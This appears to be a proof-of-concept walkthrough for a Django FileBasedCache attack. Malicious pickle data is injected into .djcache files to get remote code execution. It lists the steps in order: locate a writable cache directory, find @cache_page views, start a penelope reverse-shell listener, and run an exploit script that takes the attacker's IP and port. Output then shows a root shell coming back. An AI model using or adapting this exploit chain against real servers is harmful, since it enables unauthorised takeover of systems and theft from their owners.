Django FileBasedCache abuse via malicious Pickle injection into .djcache files for RCE.
1. Determine Cache Mechanism & Location: Ensure that filebased.FileBasedCache is defined in settings.py and the directory specified in the LOCATION setting is writable.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/var/tmp/django_cache',
}
}2. Determine where the Caching Logic is Applied: The cache decorator (i.e., @cache_page) is generally defined in views.py. The view function may be subject to cache manipulation. Access this endpoint to generate .djcache files.
grep -Ri '@cache' webApp/@cache_page(60)
def endpoint(request):
[...]3. Start Listener
penelope -p 99994. Execute PoC: Trigger the payload by accessing the vulnerable endpoint again.
foo@bar:~$ python3 djangoFBCacheRCE.py
Enter Django cache directory path: /var/tmp/django_cache
Using cache directory: /var/tmp/django_cache
Enter host IP address: x.x.x.x
Enter listening port: 9999
Payload written to 1f0acfe7480a469402f1852f8313db86.djcache.
Payload written to 90dbab8f3b1e54369abdeb4ba1efc106.djcache.penelope -p 9999
[+] Listening for reverse shells on 0.0.0.0:9999 → 127.0.0.1 • 192.168.189.134 • 172.17.0.1 • 172.18.0.1 • 10.10.14.6
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from bar~x.x.x.x-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/blkbrd/.penelope/bar~x.x.x.x-Linux-x86_64/2099_11_01-01_xx_xx-xx.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@bar:/var/www/webApp# id
uid=0(root) gid=0(root) groups=0(root)